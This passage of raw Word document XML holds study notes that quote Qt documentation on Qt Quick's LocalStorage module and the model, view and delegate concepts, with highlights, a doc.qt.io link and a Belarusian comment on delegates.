          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2247" w:name="data-storage-and-access"/>
      <w:bookmarkStart w:id="2248" w:name="_Toc483001016"/>
      <w:bookmarkStart w:id="2249" w:name="_Toc483004007"/>
      <w:bookmarkStart w:id="2250" w:name="_Toc483604357"/>
      <w:bookmarkStart w:id="2251" w:name="_Toc483605577"/>
      <w:bookmarkEnd w:id="2247"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data Storage and Access</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2248"/>
      <w:bookmarkEnd w:id="2249"/>
      <w:bookmarkEnd w:id="2250"/>
      <w:bookmarkEnd w:id="2251"/>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00840F02">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Databases are commonly used to store information in applications. Qt Quick provides </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simplified access to relational databases via</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2547" w:history="1">
        <w:r w:rsidRPr="00840F02">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QtQuick.LocalStorage</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00840F02">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRPr="00840F02" w:rsidRDefault="00840F02" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00840F02" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2548" w:history="1">
        <w:r w:rsidR="00840F02" w:rsidRPr="00E20DF4">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-modelviewsdata-modelview.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2252" w:name="_Toc483001017"/>
      <w:bookmarkStart w:id="2253" w:name="_Toc483004008"/>
      <w:bookmarkStart w:id="2254" w:name="_Toc483604358"/>
      <w:bookmarkStart w:id="2255" w:name="_Toc483605578"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Models and Views in Qt Quick</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2252"/>
      <w:bookmarkEnd w:id="2253"/>
      <w:bookmarkEnd w:id="2254"/>
      <w:bookmarkEnd w:id="2255"/>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 xml:space="preserve">Simply put, applications need to form data and display the data. Qt Quick has the </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>notion of</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>models</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>views</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegates</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to display data</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. They </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>modularize the visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data in order to give the developer or designer control over the different aspects of the data. A developer can </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>swap a list view with a grid view with little changes to the data</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. Similarly, encapsulating an instance of the data in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate allows the developer to dictate how to present or handle the data</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="centeralign"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/modelview-overview.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png"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"http://doc.qt.io/qt-5/images/modelview-overview.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1076" type="#_x0000_t75" alt="" style="width:179.7pt;height:194.7pt">
            <v:imagedata r:id="rId2549" r:href="rId2550"/>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Pr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- contains the data and its structure. There are several QML types for creating models.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- a container that displays the data. The view might display the data in a list or a grid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delegate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- dictates how the data should appear in the view. The delegate takes each data in the model and </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encapsulates</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> it. </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>data is accessible through the delegate</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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To visualize data, bind the view's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>model</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to a model and the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>delegate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property to a component or another compatible type.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E1023E" w:rsidRPr="00E1023E" w:rsidRDefault="00E1023E" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>дэлегат выконвае дваякую ролю: ён указвае, як маляваць; і ён указвае, што з дадзенаў маляваць. Ажыццяўляе як бы выбарку з дадзенаў. Ці гэта ўжо кантролер. Тут тэрміналогія не вельмі ўсталяваная, але сутнасць ясна</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="002230B8" w:rsidRDefault="00630F70" w:rsidP="00E1023E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2256" w:name="displaying-data-with-views"/>
      <w:bookmarkStart w:id="2257" w:name="_Toc483001018"/>
      <w:bookmarkStart w:id="2258" w:name="_Toc483004009"/>
      <w:bookmarkStart w:id="2259" w:name="_Toc483604359"/>
      <w:bookmarkStart w:id="2260" w:name="_Toc483605579"/>
      <w:bookmarkEnd w:id="2256"/>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Displaying</w:t>
      </w:r>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidRPr="002230B8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E1023E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Views</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2257"/>
      <w:bookmarkEnd w:id="2258"/>
      <w:bookmarkEnd w:id="2259"/>
      <w:bookmarkEnd w:id="2260"/>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Views are </w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>containers for collections of items</w:t>
      </w:r>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. They are feature-rich and can be customizable to meet style or behavior requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00630F70" w:rsidRPr="00630F70" w:rsidRDefault="00630F70" w:rsidP="00630F70">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2261" w:name="qtquick-views"/>
      <w:bookmarkEnd w:id="2261"/>
      <w:r w:rsidRPr="00630F70">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A set of </w:t>
      </w:r>
